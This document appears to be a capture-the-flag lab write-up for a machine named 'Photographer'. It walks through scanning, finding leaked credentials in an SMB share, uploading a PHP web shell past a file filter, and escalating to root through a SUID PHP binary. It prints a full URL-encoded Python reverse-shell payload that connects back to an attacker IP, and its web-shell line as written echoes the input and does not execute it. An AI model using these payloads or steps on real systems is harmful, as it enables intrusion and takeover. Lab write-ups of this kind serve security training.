Photographer

Target IP: 192.168.170.76


Scanning

7c61b29d4e069f44e9babe3ec602633b.png
5f953081fdd2469943a8a2ae04aee41a.png
There are five TCP ports open on the machine: SSH, HTTP, SMB, and another HTTP. I will start my enumeration with the HTTP application on both ports 80 and 8000.


Enumeration

Port 80: HTTP

e860e719737e1ea4b3c5218ef7f98d0f.png
We are presented the webpage above when we browse to this port from a web-browser. The username v1n1v131r4 is interesting. Doing a source-code scan did not show anything important.

c20b7d6081bd7a3f1f1cf57eb1f96e4c.png
Doing a directory search using the command gobuster dir -u http://192.168.170.76/ -w /usr/share/wordlists/dirb/big.txt -x php,html points to /assets which contains the files for this application, but it is not very helpful.

Port 8000: HTTP
95c0d5cbfef5c0265ab51535146a7128.png
The webpage above is displayed to us when we visit the port 8000 using a web-browser. Could the text daisa ahomi be a name? Navigating around the site did not show anything interesting.

4f8e90b684c25b41d8d9e26758b0c10a.png
However, while scanning through the source-code, I did find the version and name of the application running on this port. It is Kroken 0.22.24.

e1103815617cec0a413a562e0ca7a67b.png
Doing a Google search leads to an unverified exploit for this application. It requires authentication before we can fire this exploit against this port.

46e2bd72ab663649cec6c80b1aa35b86.png
From the directory scan above using gobuster dir -u http://192.168.170.76:8000/ -w /usr/share/wordlists/dirb/big.txt -x php,html --exclude-length 0, I got interesting results.

8d6374661b6ecf6ed4e5a958a9243d02.png
The /admin/ directory allows sign-in. Maybe we can find working credentials and sign-in?

Ports 139 and 445: SMB
7d2b3f207dfcae9e4eb0ed4a17ba886e.png
The SMB is open. We have read access over the samba share called sambashare . This share contains two files: mailsent.txt and wordpress.bkp.zip. I downloaded both of these files on my machine. The first file sounds interesting.

b55179a324f99f3ff20969ae17b0e4d0.png
The mail contains the content above. There is so much information here. We get the names and emails of the two users of HTTP applications. Could the babygirl be a password? Apparently this application running on port 8000 is owned by daisa@photographer.com, so is daisa@photographer.com:babygirl a valid credential?

97766a3b29a7d8fc93f89e87b6f1afe5.png
And it worked. I used the credentials above to access the admin page. Looks like we have full control of the website as we are admin.

7e290b0ac6cf480ebc7ffe1c309780ad.png
We have more information about the system as shown above. I want to exploit this machine manually, rather than using a working exploit.


Exploitation

Now we have access to the admin panel, it is time to exploit it.

I created a simple online PHP web shell with the code <?php echo($_GET['cmd']);?> and named it as shell.php.jpg. I tried to upload a PHP file as it is, but the application did not this. I overcame this by using BurpSuite. After pressing Import content, selecting my web shell, and pressing Import, I intercepted the POST request and made a few changes to the name of the file.

4b0e163142f757490f6b3b14bd87a797.png
I removed the .jpg file extension inside burpsuite. Then I forwarded all the intercepted HTTP packets.

1c1c0f0d9f15f83addcfbf3024f2d254.png
My PHP webshell got uploaded successfully. To access it, I went to http://192.168.170.76:8000/storage/originals/e0/c9/shell.php.

32ba34342058a68a972870e41da63014.png
And the PHP webshell seems to be working fine. Time to get a reverse shell connection.

03d8f060dcbca8f8dd8d73481455992e.png
From my testing, the PHP reverse shells did not work which is why I used Python instead. And now I have a foothold on the machine.
Payload: python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.211%22%2C80%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27
Full URL with payload: http://192.168.170.76:8000/storage/originals/e0/c9/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.211%22%2C80%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27


Privilege Escalation

fb9fe82f57c03f797bb50cf9d4b23af2.png
Looks like the PHP 7.2 binary has SUID bit set. We can use this to gain root privileges.

4f87950b512a7c1349fdb6a4604f824f.png
And now we are root!


Flags

7d9f6b42e7d766f288a7fe7071e4849f.png
The local.txt flag is inside daisa's home directory.

fcbfe480025496add18950bddac79688.png
The proof.txt flag once I used the php binary to elevate privileges to root.